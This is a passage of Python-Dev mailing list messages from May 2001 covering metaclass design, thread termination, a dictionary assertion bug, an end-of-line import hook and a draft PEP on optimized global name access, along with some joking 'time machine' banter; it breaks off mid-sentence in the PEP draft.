Guido's metaclass hook in Python goes this way:

If a base class (let's better call it a 'base object')
has a __class__ attribute, this is called to create the
new class.


From guido at digicool.com  Wed May 23 20:02:06 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 23 May 2001 14:02:06 -0400
Subject: [Python-Dev] New metaclass pattern (Was Re: Simulating Class (was Re: Does Python have Class methods))
In-Reply-To: Your message of "Wed, 23 May 2001 19:28:07 +0200."
             <020301c0e3ad$bb559790$e000a8c0@thomasnotebook> 
References: <OF92F5AE57.7BB01157-ON88256A50.00672E1C@i2.com>  
            <020301c0e3ad$bb559790$e000a8c0@thomasnotebook> 
Message-ID: <200105231802.f4NI26408784@odiug.digicool.com>

> [this message has also been posted to comp.lang.python]
[And I'm cc'ing there]

> Guido's metaclass hook in Python goes this way:
> 
> If a base class (let's better call it a 'base object')
> has a __class__ attribute, this is called to create the
> new class.
> 
> From demo/metaclasses/index.html:
> 
> class C(B):
>     a = 1
>     b = 2
> 
> Assuming B has a __class__ attribute, this translates into:
> 
> C = B.__class__('C', (B,), {'a': 1, 'b': 2})

Yes.

> Usually B is an instance of a normal class.

No, B should behave like a class, which makes it an instance of a
metaclass.

> So the above code will create an instance of B,
> call B's __init__ method with 'C', (B,), and {'a': 1, 'b': 2},
> and assign the instance of B to the variable C.

No, it will not create an instance of B.  It will create an instance
of B.__class__, and that instance (C) is a subclass of B.  The difference between
subclassing and instantiation is confusing, but crucial, when talking
about metaclasses!  See the ASCII art in my classic post to the
types-sig:
http://mail.python.org/pipermail/types-sig/1998-November/000084.html

> I've ever since played with this metaclass hook, and
> always found the problem that B would have to completely
> simulate the normal python behaviour for classes (modifying
> of course what you want to change).
> 
> The problem is that there are a lot of successful and
> unsuccessful attribute lookups, which require a lot
> of overhead when implemented in Python: So the result
> is very slow (too slow to be usable in some cases).

Yes.  You should be able to subclass an existing metaclass!
Fortunately, in the descr-branch code in CVS, this is possible.  I
haven't explored it much yet, but it should be possible to do things
like:

Integer = type(0)
Class = Integer.__class__   # same as type(Integer)

class MyClass(Class):
    pass    # metaclass customizations go here

MyObject = MyClass("MyObject", (), {})

myInstance = MyObject()

Here MyClass declares a metaclass, and MyObject is a regular class
that uses MyClass for its metaclass.  Then, myInstance is an instance
of MyObject.
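For comparison, here is the snippet above fleshed out so it runs on a modern Python 3, where the descr-branch work eventually landed. The describe() method is a hypothetical customization added only to show where metaclass methods live: they are callable on the class MyObject, but not on its instance.

```python
Integer = type(0)
Class = Integer.__class__               # the built-in metaclass, i.e. type

class MyClass(Class):
    """A metaclass: calling it produces a class."""
    def describe(cls):
        # Hypothetical helper; available on classes made by MyClass.
        return "class %s made by %s" % (cls.__name__, type(cls).__name__)

MyObject = MyClass("MyObject", (), {})  # instantiating the metaclass -> a class
myInstance = MyObject()                 # instantiating that class -> an object

class Sub(MyObject):                    # subclassing reuses MyObject's metaclass
    pass

print(MyObject.describe())              # class MyObject made by MyClass
print(type(Sub).__name__)               # MyClass
print(hasattr(myInstance, "describe"))  # False: metaclass methods stay on classes
```

The last line is the subclassing-versus-instantiation distinction in miniature: myInstance is an instance of MyObject, and MyObject is an instance of MyClass, so attributes defined on MyClass are one level removed from myInstance.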

See the end of PEP 252 for info on getting the descr-branch code
(http://python.sourceforge.net/peps/pep-0252.html).

> ------
> 
> Python 2.1 allows attaching attributes to function objects,
> so a new metaclass pattern can be implemented.
> 
> The idea is to let B be a function having a __class__ attribute
> (which does _not_ have to be a class, it can again be a function).

Oh, yuck.  I suppose this is fine if you want to experiment with
metaclasses in 2.1, but please consider using the descr-branch code
instead so you can see what 2.2 will be like!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mal at lemburg.com  Wed May 23 20:40:58 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 23 May 2001 20:40:58 +0200
Subject: [Python-Dev] Daily Python URL on your Palm
Message-ID: <3B0C043A.D5C9C604@lemburg.com>

Just thought you might want to know that Fredrik's Daily Python
URL can be downloaded onto the Palm as Avantgo Channel.

Here's the URL for adding the channel:
http://avantgo.com/mydevice/autoadd.html?title=Daily%20Python%20URL&url=http%3A%2F%2Fwww.pythonware.com%2Fdaily%2Findex.htm&max=100&depth=1&images=0&links=1&refresh=always&hours=1&dflags=0&hour=0&quarter=00&s=00

PS: Would be nice if Fredrik could provide a "printable" version
of the Daily URL page, since the table layout doesn't work too
well on the small Palm display.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From thomas.heller at ion-tof.com  Wed May 23 20:57:28 2001
From: thomas.heller at ion-tof.com (Thomas Heller)
Date: Wed, 23 May 2001 20:57:28 +0200
Subject: [Python-Dev] New metaclass pattern (Was Re: Simulating Class (was Re: Does Python have Class methods))
References: <OF92F5AE57.7BB01157-ON88256A50.00672E1C@i2.com>              <020301c0e3ad$bb559790$e000a8c0@thomasnotebook>  <200105231802.f4NI26408784@odiug.digicool.com>
Message-ID: <033901c0e3ba$36aaa870$e000a8c0@thomasnotebook>

Let me try again (and please forgive my
mistakes in the detail).
The usual way (as in demo\metaclasses):

class B_Meta:
    ....

B = B_Meta('B', (), {})

class C(B):
    pass

B is an instance of the (meta)class B_Meta.
C is now another instance of the same (meta)class,
because B.__class__, which is the (meta)class itself,
is called and returns a new instance.
B_Meta can (and must) implement a lot of behaviour.

In contrast, with my recipe:

def MagicFunction(name, bases, dict):
    ...construct a class on the fly...
    ...create an instance of this class...
    return an_instance_of_a_class

def B(): pass
B.__class__ = MagicFunction

class C(B):
    pass

Now C is an_instance_of_a_class (which is an instance
of a normal python class), and thus does inherit the
normal behaviour of Python classes.
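Python 3 later made this pattern explicit: the metaclass= keyword in a class statement accepts any callable, not only a class, and whatever that callable returns is bound to the class name. A sketch of the recipe in that form follows; MagicFunction's body is a hypothetical stand-in for the "construct a class on the fly" step.

```python
def MagicFunction(name, bases, namespace):
    # Build an ordinary class from the class body...
    klass = type(name, bases, dict(namespace))
    # ...and return an instance of it instead of the class itself.
    return klass()

class C(metaclass=MagicFunction):
    a = 1

    def hello(self):
        return "hello from an instance of %s" % type(self).__name__

print(C.hello())             # hello from an instance of C
print(isinstance(C, type))   # False: C is an instance, not a class
```

Because the class is built by type(), C gets all the normal attribute-lookup behaviour for free, which is the point of the recipe.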

Thomas

PS: I'm sure this all will be much better in descr-branch.
I've checked it out and am playing with it from time
to time, but most of the time I have to use released
Python versions.


From tim.one at home.com  Wed May 23 21:32:59 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 23 May 2001 15:32:59 -0400
Subject: [Python-Dev] Python 2.1.1
In-Reply-To: <20010523160025.B690@xs4all.nl>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com>

[Thomas Wouters]
>
> As those of you on python-checkins might have noticed ;) I started
> checking in Python 2.1.1 bugfixes.

And bless you for it, Thomas!

> I'd hoped to finish all of my backlog today, but unfortunately I'm
> now called away on a surprise emergency meeting,

Now that sucks.  Tell your manager that you'll only attend planned emergency
meetings from now on:  Guido plans Python crises years in advance, and it
shows in the relative cleanliness of the Python codebase <wink>.


From nas at python.ca  Wed May 23 21:41:14 2001
From: nas at python.ca (Neil Schemenauer)
Date: Wed, 23 May 2001 12:41:14 -0700
Subject: [Python-Dev] Python 2.1.1
In-Reply-To: <LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com>; from tim.one@home.com on Wed, May 23, 2001 at 03:32:59PM -0400
References: <20010523160025.B690@xs4all.nl> <LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com>
Message-ID: <20010523124114.A4747@glacier.fnational.com>

Tim Peters wrote:
> Guido plans Python crises years in advance, and it shows in the
> relative cleanliness of the Python codebase <wink>.

I don't think Thomas has a time machine.

  Neil


From tim.one at home.com  Wed May 23 21:45:06 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 23 May 2001 15:45:06 -0400
Subject: [Python-Dev] Killing threads
In-Reply-To: <20010523140845.B092299C83@waltz.rahul.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEBJKEAA.tim.one@home.com>

[Aahz]
> Okay, so we all know it isn't possible to kill threads cleanly and
> safely in any kind of cross-platform way.  At the same time, a program
> that has a thread running haywire should be able to kill itself
> completely, so that a monitoring process can restart it.  How hard would
> it be to do only that in a cross-platform way?

Since Python is written in C, and C says nothing about this, you need a
platform expert for each platform covered by "cross" <wink>.

> I'm guessing that for Unix, we'd just send a hard signal (9 or 15).  No
> clue what would need to happen for Windows and Mac.
>
> (This got brought up because I experimented with os._exit() as a
> possible solution, but that GPFs on Win98SE.)

Please open a bug report on that, then, with a tiny test case if possible.
This worked fine on Win98SE for me just now:

import thread, os, time

def task():
    while 1:
        print "x",
        time.sleep(.1)

for i in range(10):
    thread.start_new_thread(task, ())

time.sleep(5)
os._exit(1)

Windows kills all threads spawned by a process when "the main thread" exits.
You don't need to do os._exit(), and sys.exit() is normally a much better
idea (else, e.g., stdio buffers may not get flushed to disk).
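A minimal sketch combining the Unix guess with the Windows observation above: send SIGKILL to the process itself where that signal exists, and fall back to os._exit() elsewhere. Either way every thread dies at once and, as noted, buffered output is not flushed. The function name die_hard is hypothetical.

```python
import os
import signal

def die_hard(status=1):
    """Terminate the whole process, all threads included, immediately.

    Nothing is cleaned up: atexit handlers, finally clauses and stdio
    buffers are all skipped, so a monitor should treat this as a crash.
    """
    if hasattr(signal, "SIGKILL"):
        # POSIX: SIGKILL cannot be caught, blocked, or ignored.
        os.kill(os.getpid(), signal.SIGKILL)
    # Platforms without SIGKILL (e.g. Windows): exit without cleanup.
    os._exit(status)
```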


From thomas at xs4all.net  Wed May 23 22:27:51 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Wed, 23 May 2001 22:27:51 +0200
Subject: [Python-Dev] Python 2.1.1
In-Reply-To: <20010523124114.A4747@glacier.fnational.com>; from nas@python.ca on Wed, May 23, 2001 at 12:41:14PM -0700
References: <20010523160025.B690@xs4all.nl> <LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com> <20010523124114.A4747@glacier.fnational.com>
Message-ID: <20010523222751.G690@xs4all.nl>

On Wed, May 23, 2001 at 12:41:14PM -0700, Neil Schemenauer wrote:
> Tim Peters wrote:
> > Guido plans Python crises years in advance, and it shows in the
> > relative cleanliness of the Python codebase <wink>.
> 
> I don't think Thomas has a time machine.

*Don't* get me started on that. If only Guido would stop hogging the damned
thing, I could be a 34-year-old millionaire in a 10-room house and 8
girlfriends !

Now-I'm-short-ten-years-nine-million-eight-rooms-and-seven-girlfriends-ly
y'rs,
-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From tim.one at home.com  Wed May 23 22:32:04 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 23 May 2001 16:32:04 -0400
Subject: [Python-Dev] Assertion failed in dictobject.c
In-Reply-To: <20010523111510.D504D3B8999@snelboot.oratrix.nl>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEBOKEAA.tim.one@home.com>

[Jack Jansen]
> I'm seeing the assert on line 525 in dictobject.c (revision 2.92)
> failing. The debugger tells me that ma_fill and ma_size are both 8.
> ma_used is 2, and interestingly hash is also 8.

You wouldn't happen to have a reproducible test case?  That hash==8 is almost
certainly a red herring -- or a sign of wild stores <wink>.

> Going back to revision 2.90 fixes the problem (or masks it).

Instead of:

	assert(mp->ma_fill < mp->ma_size);

this code used to be:

	if (mp->ma_fill >= mp->ma_size) {
		/* No room for a new key.
		 * This only happens when the dict is empty.
		 * Let dictresize() create a minimal dict.
		 */
		assert(mp->ma_used == 0);
		if (dictresize(mp, 0) != 0)
			return -1;
		assert(mp->ma_fill < mp->ma_size);
	}

so the dict would get resized whenever ma_fill >= ma_size, although the code
only *expected* that to happen when the dict table was NULL.  It was perhaps
happening in other cases too.  The dict is never empty (NULL) after the
patch, so the special case for "empty" got replaced by an assert.

Offhand I don't see how this could be triggering -- although *something*
about the 2.90 logic makes me uneasy!  Ah, mp->ma_fill >= mp->ma_size wasn't
a correct test:  filled slots that aren't used slots don't stop a new key
from being added.  Assuming that's it, 2.90 could do needless calls to
dictresize, but the new version does a bogus assert instead.  So replace the
current version's offending

	assert(mp->ma_fill < mp->ma_size);

with

	assert(mp->ma_used < mp->ma_size);

Let me know whether that solves it.

2.90 may also suffer a bogus

		assert(mp->ma_used == 0);

failure.  It's not easy to provoke any of this, though (requires exactly the
right sequence of mixed inserts and deletes, with hash codes hitting exactly
the right dict slots).
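The point that filled slots which aren't used slots don't stop a new key from being added can be seen in a toy open-addressing table. This is a simplified model, not dictobject.c: it uses linear probing instead of CPython's probe sequence and never resizes. With a key sequence like the one in the follow-up test case, fill equals size just before key 8 arrives, yet key 8 still fits by reusing a dummy slot.

```python
EMPTY = object()   # slot never used
DUMMY = object()   # slot held a key that was later deleted

class ToyDict:
    """Open addressing with dummy markers; linear probing, no resizing."""

    def __init__(self, size=8):
        self.size = size              # must be a power of two
        self.slots = [EMPTY] * size
        self.used = 0                 # live keys       (like ma_used)
        self.fill = 0                 # live + dummies  (like ma_fill)

    def _probe(self, key):
        mask = self.size - 1
        i = hash(key) & mask
        for _ in range(self.size):    # visit every slot at most once
            yield i
            i = (i + 1) & mask

    def insert(self, key, value):
        freeslot = None
        for i in self._probe(key):
            slot = self.slots[i]
            if slot is EMPTY:
                if freeslot is None:  # no dummy seen: consume a fresh slot
                    freeslot = i
                    self.fill += 1
                break
            if slot is DUMMY:
                if freeslot is None:
                    freeslot = i      # remember the first reusable dummy
            elif slot[0] == key:
                self.slots[i] = (key, value)   # overwrite an existing key
                return
        if freeslot is None:          # only possible if every slot is live
            raise RuntimeError("table full")
        self.slots[freeslot] = (key, value)
        self.used += 1

    def delete(self, key):
        for i in self._probe(key):
            slot = self.slots[i]
            if slot is EMPTY:
                break
            if slot is not DUMMY and slot[0] == key:
                self.slots[i] = DUMMY  # fill is unchanged
                self.used -= 1
                return
        raise KeyError(key)


d = ToyDict()
for i in range(5):
    d.insert(i, i)
for i in range(5):
    d.delete(i)
for i in range(5, 8):
    d.insert(i, i)
print(d.used, d.fill, d.size)   # 3 8 8: a "fill < size" assert would fire here
d.insert(8, 8)                  # ...but key 8 reuses the dummy in slot 0
print(d.used, d.fill)           # 4 8
```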


From barry at digicool.com  Wed May 23 22:52:22 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Wed, 23 May 2001 16:52:22 -0400
Subject: [Python-Dev] Python 2.1.1
References: <20010523160025.B690@xs4all.nl>
	<LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com>
	<20010523124114.A4747@glacier.fnational.com>
	<20010523222751.G690@xs4all.nl>
Message-ID: <15116.8966.324136.897953@anthem.wooz.org>

>>>>> "TW" == Thomas Wouters <thomas at xs4all.net> writes:

    TW> *Don't* get me started on that. If only Guido would stop
    TW> hogging the damned thing, I could be a 34-year-old millionaire
    TW> in a 10-room house and 8 girlfriends !

It's really not as easy as all that, though.  When Guido's not around,
I've been known to, er, take The Machine for a spin (sshh!  Do /not/
tell him!).  The first time I did, I didn't realize that the blue
toggle had to be in the down position, and when I stepped out,
everybody was speaking Esperanto, had half their heads shaved, and
were toting around what looked like a cross between a dog and a beach
ball (it drooled incessantly).

Fortunately, The Machine has a reset button (oddly labeled "History
Erase Button" and guarded by a candy-crazed TV announcer-like
automaton who must be coaxed from the button with a marshmallow
s'more).

The second time I used it, I'd forgotten that you must keep your left
hand on the silver sphere while you line up the parallel lines with
the lip-actuated alpha wheel.  Silly me, I'd removed my left hand just
before alignment in order to twist the fluoroscopic reflection tube a
quarter rotation out of phase (rule of thumb: never listen to that
automaton when he's licked the last of the chocolate-y goo from his
fingers.  He'll say anything to get another s'more.)

You really don't want to know what that particular world looked like,
but let's just say it involved lots and lots of angry elephants.

So now I leave well enough alone, and I've learned that if you really
want to change the past, just wait for Guido to use it for his own
nefarious purposes, and tape a sign to his back requesting the (very
modest) change to the continuum that you're looking for.

And don't forget to smear the front of that sign with s'more.

-Barry


From tim.one at home.com  Wed May 23 23:02:17 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 23 May 2001 17:02:17 -0400
Subject: [Python-Dev] Assertion failed in dictobject.c
In-Reply-To: <LNBBLJKPBEHFEDALKOLCCEBOKEAA.tim.one@home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGECAKEAA.tim.one@home.com>

[Jack Jansen]
> I'm seeing the assert on line 525 in dictobject.c (revision 2.92)
> failing. The debugger tells me that ma_fill and ma_size are both 8.
> ma_used is 2, and interestingly hash is also 8.

[Tim]
> You wouldn't happen to have a reproducible test case?

Nevermind; I do:

d = {}
for i in range(5):
    d[i] = i
for i in range(5):
    del d[i]
for i in range(5, 9):  # assert triggers when i == 8
    d[i] = i

The cure is more complicated than I described, though.


From esr at thyrsus.com  Thu May 24 00:39:49 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Wed, 23 May 2001 18:39:49 -0400
Subject: [Python-Dev] Python 2.1.1
In-Reply-To: <15116.8966.324136.897953@anthem.wooz.org>; from barry@digicool.com on Wed, May 23, 2001 at 04:52:22PM -0400
References: <20010523160025.B690@xs4all.nl> <LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> <15116.8966.324136.897953@anthem.wooz.org>
Message-ID: <20010523183949.A19251@thyrsus.com>

Barry A. Warsaw <barry at digicool.com>:
> You really don't want to know what that particular world looked like,
> but let's just say it involved lots and lots of angry elephants.

You've been *there*?  Dang...that's the timeline that scared me into
hanging up my lab coat.  It was a slow Saturday and I was hatching
Sinister Plan For World Domination number 4.

What happened to the other three?  Well...I had been planning to
terrorize the western U.S. with a giant mechanical spider, until some
guys from Hollywood offered me way too much money for it.  The trained
army of radioactive gorillas I spent the movie money on didn't work
out -- my Igor flatly refused to shovel any more radioactive gorilla
poop, and you know how hard it is to get good help these days.
Blackmailing major cities with a Zeppelin-mounted death ray projector
sounded cool but Radio Shack was out of the parts.

OK, so plan #4 was to create voracious mega-amoebas using my Ionic
Mutatron and send them out to destroy all my enemies, especially that
kid who beat me up in third grade.  There I was, cackling insanely,
just about to unleash these slimy horrors on an unsuspecting world to
wreak havoc and destruction, when the eka-rhodium electrodes on the
Mutatron arced over.  This produced a wild spike of temporokinetic
energy, and guess where *I* was standing?  Silly me.

Before you could say "plot complication" I was materializing in the
Hyraxeum -- damn near nose-to-trunk with the High Pachyderm himself,
as it turned out, who was getting wound up to try out his newest
human-goad on a mahout they had just captured from the Fortified
Cities.  The mahout was terrified out of his wits, and you would have
been too if you'd seen what the High Pachyderm's tusks were covered
with and the lascivious way his trunk was curled around that cheese
grater.  Euggghhh...

It was crazy.  The High Pachyderm was trumpeting like mad, tuskers
charging at me from all directions, and me with at least 5.23 seconds
to go until the temporokinetic charge wore off.  Fortunately I
remembered that elephants communicate using modulated infrasonics that
they hear with the flat part of their foreheads, and I had my trusty
sonic screwdriver on me.  I set it to "infra" at maximum volume and
hurled it at the High Pachyderm -- hit the bugger right in the tiara.
He went berserk and his confused guards started crashing into each
other left and right, which was a pretty impressive sight since the
smallest of them weighed over two and a half tons.
 
It was touch and go there, let me tell you.  I caught one glimpse of
the mahout's rapidly-retreating heels just as the charge wore off and
I was slingshotted back to my lab.  My sonic screwdriver, of course,
followed within seconds -- horribly crushed and mangled.

And that's when I swore off building fiendish devices.  Electrocution
I can laugh at, having my monstrous creations turn on me is all in a
day's work, and that one time I was accidentally transformed into a
fly I found some truly remarkable uses for a three-foot-long
prehensile tongue.  But what the High Pachyderm had planned was too
twisted even for *me*.

I decided Sinister Plan #5 would have to be a bit less hardware-intensive,
if only as a rest for my frazzled nerves.  So I spent the last juice in
the batteries on the orbital mind-control lasers (long story) to implant
some subtle suggestions in a few minds at Netscape and IBM and elsewhere,
and started hitting the conference circuit pretty heavy.

What suggestions?  Oh, nothing important.  Nothing at all...BWAHAHAHAHA!!!
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

Sometimes the law defends plunder and participates in it. Sometimes
the law places the whole apparatus of judges, police, prisons and
gendarmes at the service of the plunderers, and treats the victim --
when he defends himself -- as a criminal.
	-- Frederic Bastiat, "The Law"


From gward at python.net  Thu May 24 01:48:10 2001
From: gward at python.net (Greg Ward)
Date: Wed, 23 May 2001 19:48:10 -0400
Subject: [Python-Dev] Python 2.1.1
In-Reply-To: <15116.8966.324136.897953@anthem.wooz.org>; from barry@digicool.com on Wed, May 23, 2001 at 04:52:22PM -0400
References: <20010523160025.B690@xs4all.nl> <LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> <15116.8966.324136.897953@anthem.wooz.org>
Message-ID: <20010523194810.A9947@gerg.ca>

On 23 May 2001, Barry A. Warsaw said:
> The second time I used it, I'd forgotten that you must keep your left
> hand on the silver sphere while you line up the parallel lines with
> the lip-actuated alpha wheel.

What?  You mean Guido's time machine was really designed by Larry Wall?
Oh, the irony...

        Greg
-- 
Greg Ward - Python bigot                                gward at python.net
http://starship.python.net/~gward/
If you can read this, thank a programmer.


From dgoodger at bigfoot.com  Thu May 24 03:04:46 2001
From: dgoodger at bigfoot.com (David Goodger)
Date: Wed, 23 May 2001 21:04:46 -0400
Subject: [Python-Dev] Re: Import hook to do end-of-line conversion?
In-Reply-To: <3B0AF45D.732126E6@home.net>
Message-ID: <B731D420.11CB9%dgoodger@bigfoot.com>

Yesterday I found I had need for an end-of-line conversion import hook. I
looked around but found none (did I miss some code on this thread?), so I
whipped one up (below). It seems to do the job. If you see any goofs, gaffes
or gotchas, or if you know of a better way to do this, please let me know. I
will post this code to c.l.py in a few days for the enjoyment of all.

-- 
David Goodger    dgoodger at bigfoot.com    Open-source projects:
 - The Go Tools Project: http://gotools.sourceforge.net
 - reStructuredText: http://structuredtext.sourceforge.net (soon!)

-----%<----------cut----------%<----------%<----------cut----------%<-----

# Import hook for end-of-line conversion,
# by David Goodger (dgoodger at bigfoot.com).

# Put in your sitecustomize.py, anywhere on sys.path, and you'll be able to
# import Python modules with any of Unix, Mac, or Windows line endings.

import ihooks, imp, py_compile

class MyHooks(ihooks.Hooks):

    def load_source(self, name, filename, file=None):
        """Compile source files with any line ending."""
        if file:
            file.close()
        py_compile.compile(filename)    # line ending conversion is in here
        cfile = open(filename + (__debug__ and 'c' or 'o'), 'rb')
        try:
            return self.load_compiled(name, filename, cfile)
        finally:
            cfile.close()

class MyModuleLoader(ihooks.ModuleLoader):

    def load_module(self, name, stuff):
        """Special-case package directory imports."""
        file, filename, (suff, mode, type) = stuff
        path = None
        if type == imp.PKG_DIRECTORY:
            stuff = self.find_module_in_dir("__init__", filename, 0)
            file = stuff[0]             # package/__init__.py
            path = [filename]
        try:                            # let superclass handle the rest
            module = ihooks.ModuleLoader.load_module(self, name, stuff)
        finally:
            if file:
                file.close()
        if path:
            module.__path__ = path      # necessary for pkg.module imports
        return module

ihooks.ModuleImporter(MyModuleLoader(MyHooks())).install()
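The heart of such a hook is normalizing line endings before the source reaches the compiler. A minimal sketch of that step in isolation follows; the helper names are hypothetical and decoding the file as UTF-8 is an assumption. Note also that compile() in Python 3.2 and later accepts Windows and Mac line endings on its own.

```python
def normalize_eol(source):
    """Convert Windows (CR LF) and classic Mac (CR) line endings to LF."""
    # Order matters: handle "\r\n" first so it doesn't become two newlines.
    return source.replace("\r\n", "\n").replace("\r", "\n")

def compile_any_eol(path):
    """Read a source file in binary mode and compile it with any line ending."""
    with open(path, "rb") as f:
        text = f.read().decode("utf-8")     # assumption: UTF-8 source
    return compile(normalize_eol(text), path, "exec")
```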


From jeremy at alum.mit.edu  Thu May 24 03:10:55 2001
From: jeremy at alum.mit.edu (Jeremy Hylton)
Date: Wed, 23 May 2001 21:10:55 -0400 (EDT)
Subject: [Python-Dev] pre-PEP on optimized global names
Message-ID: <200105240110.VAA09078@newman.concentric.net>

I've been hoping to work on optimized global and builtin name support
for Python 2.2.  I'm not sure if I'll have time, but thought I'd
circulate a draft with some notes on the subject now.  Anyone
interested in this work?

Jeremy

PEP: ???
Title: Optimized Access to Module and Builtin Names
Author: jeremy at digicool.com (Jeremy Hylton)
Status: Draft
Type: Standards Track
Python-Version: 2.2
Created: 23-May-2001

Abstract

    This PEP proposes a new implementation of global module namespaces
    and the builtin namespace that speeds name resolution.  The
    implementation would use an array of object pointers for most
    operations in these namespaces.  The compiler would assign indices
    for global variables at compile time.

    The current implementation represents these namespaces as
    dictionaries.  A global name incurs a dictionary lookup each time
    it is used; a builtin name incurs two dictionary lookups, a failed
    lookup in the global namespace and a second lookup in the builtin
    namespace. 
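    As a rough illustration of that cost, the following modern-Python sketch models the lookup sequence described above. It is not CPython's implementation; the function name load_global and its (value, lookups) return value are assumptions made for the example.

```python
import builtins

_MISSING = object()  # sentinel distinguishing "absent" from a stored None

def load_global(name, module_globals, builtin_ns=vars(builtins)):
    """Rough model of a global-name load; returns (value, dict lookups)."""
    value = module_globals.get(name, _MISSING)   # lookup 1: module globals
    if value is not _MISSING:
        return value, 1
    value = builtin_ns.get(name, _MISSING)       # lookup 2: builtins
    if value is not _MISSING:
        return value, 2
    raise NameError("name %r is not defined" % name)

g = {"x": 42}
print(load_global("x", g))    # a module global, one lookup: -> (42, 1)
print(load_global("len", g))  # a builtin: one failed lookup, then a second
```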

    This implementation should speed Python code that uses
    module-level functions and variables.  It should also eliminate
    awkward coding styles that have evolved to speed access to these
    names.
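    One such style binds a global or builtin to a default argument, so that each use inside the function becomes a fast local-variable access instead of a dictionary lookup. A minimal sketch (the function names are hypothetical):

```python
def count_long_plain(words):
    # Each call to len() looks up "len" in the module globals, then builtins.
    n = 0
    for w in words:
        if len(w) > 3:
            n += 1
    return n

def count_long_fast(words, len=len):
    # The default argument captures the builtin once, when the function is
    # defined, so every use of "len" in the loop is a local-variable access.
    n = 0
    for w in words:
        if len(w) > 3:
            n += 1
    return n
```

The price of the idiom is that len now appears in the function's signature, where a caller could override it by accident.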

    The implementation is complicated because the global and builtin
    namespaces can be modified dynamically in ways that are impossible
    for the compiler to detect.  (Example: A module's namespace is
    modified by a script after the module is imported.)  As a result,
    the implementation must maintain several auxiliary data structures
    to preserve these dynamic features.
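    The following sketch shows the kind of change the compiler cannot see. It builds a throwaway module with types.ModuleType (the module name "demo" and the injected function are made up for the example) and then shadows a builtin from outside the module:

```python
import types

# A module whose function uses the builtin len().
mod = types.ModuleType("demo")
exec("def size(seq):\n    return len(seq)\n", mod.__dict__)

before = mod.size([1, 2, 3])   # resolves to the builtin len()

# Later, a script injects a global that shadows the builtin.  Nothing in
# the module's own source hints at this binding.
mod.len = lambda seq: -1
after = mod.size([1, 2, 3])    # now resolves to the injected global
```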

Introduction

    [expand on the basic ideas in the abstract]

    [describe the key parts of the design: dlict, compiler support,
    stupid name trick workarounds, optimization of other modules'
    globals] 

DLict design

    The namespaces are implemented using a data structure that has
    sometimes gone under the name dlict.  It is a dictionary that has
    numbered slots for some dictionary entries.  The type must be
    implemented in C to achieve acceptable performance.  A Python
    implementation is included here to explain the basic design:

"""A dictionary-list hybrid"""

import types

class DLict:
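    def __init__(self, names):
        # names maps each global name known at compile time to its slot index
        assert isinstance(names, types.DictType)
        size = len(names)
        self.names = names
        self.list = [None] * size   # slot values
        self.empty = [1] * size     # 1 = slot unbound, None = slot bound
        self.dict = {}              # names not known at compile time
        self.size = 0               # number of bound slots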

    def __getitem__(self, name):
        i = self.names.get(name)
        if i is None:
            return self.dict[name]
        if self.empty[i] is not None:
            raise KeyError, name
        return self.list[i]

    def __setitem__(self, name, val):
        i = self.names.get(name)
        if i is None:
            self.dict[name] = val
        else:
            if self.empty[i] is not None:
                self.size += 1      # count a slot only when it becomes bound
            self.empty[i] = None
            self.list[i] = val

    def __delitem__(self, name):
        i = self.names.get(name)
        if i is None:
            del self.dict[name]
        else:
            if self.empty[i] is not None:
                raise KeyError, name
            self.empty[i] = 1
            self.list[i] = None
            self.size -= 1

    def _bound_items(self):
        """(name, value) pairs for the numbered slots that are bound"""
        return [(name, self.list[i]) for name, i in self.names.items()
                if self.empty[i] is None]

    def keys(self):
        return [name for name, val in self._bound_items()] + self.dict.keys()

    def values(self):
        return [val for name, val in self._bound_items()] + self.dict.values()

    def items(self):
        return self._bound_items() + self.dict.items()

    def __len__(self):
        return self.size + len(self.dict)

    def __cmp__(self, dlict):
        c = cmp(self.names, dlict.names)
        if c != 0:
            return c
        c = cmp(self.size, dlict.size)
        if c != 0:
            return c
        for i in range(len(self.names)):
            c = cmp(self.empty[i], dlict.empty[i])
            if c != 0:
                return c
            if self.empty[i] is None:
                c = cmp(self.list[i], dlict.list[i])
                if c != 0:
                    return c
        return cmp(self.dict, dlict.dict)
    
    def clear(self):
        self.dict.clear()
        for i in range(len(self.names)):
            if self.empty[i] is None:
                self.empty[i] = 1
                self.list[i] = None
        self.size = 0

    def update(self, other):
        for name, val in other.items():
            self[name] = val

    def load(self, index):
        """dlict-special method to support indexed access"""
        if self.empty[index] is None:
            return self.list[index]
        else:
            raise KeyError, index # XXX might want reverse mapping

    def store(self, index, val):
        """dlict-special method to support indexed access"""
        if self.empty[index] is not None:
            self.size += 1
        self.empty[index] = None
        self.list[index] = val

    def delete(self, index):
        """dlict-special method to support indexed access"""
        if self.empty[index] is not None:
            raise KeyError, index
        self.empty[index] = 1
        self.list[index] = None
        self.size -= 1


Compiler issues

    The compiler currently collects the names of all global variables
    in a module.  These are names bound at the module level or bound
    in a class or function body that declares them to be global.

    The compiler would assign indices for each global name and add the
    names and indices of the globals to the module's code object.
    Each code object would then be bound irrevocably to the module it
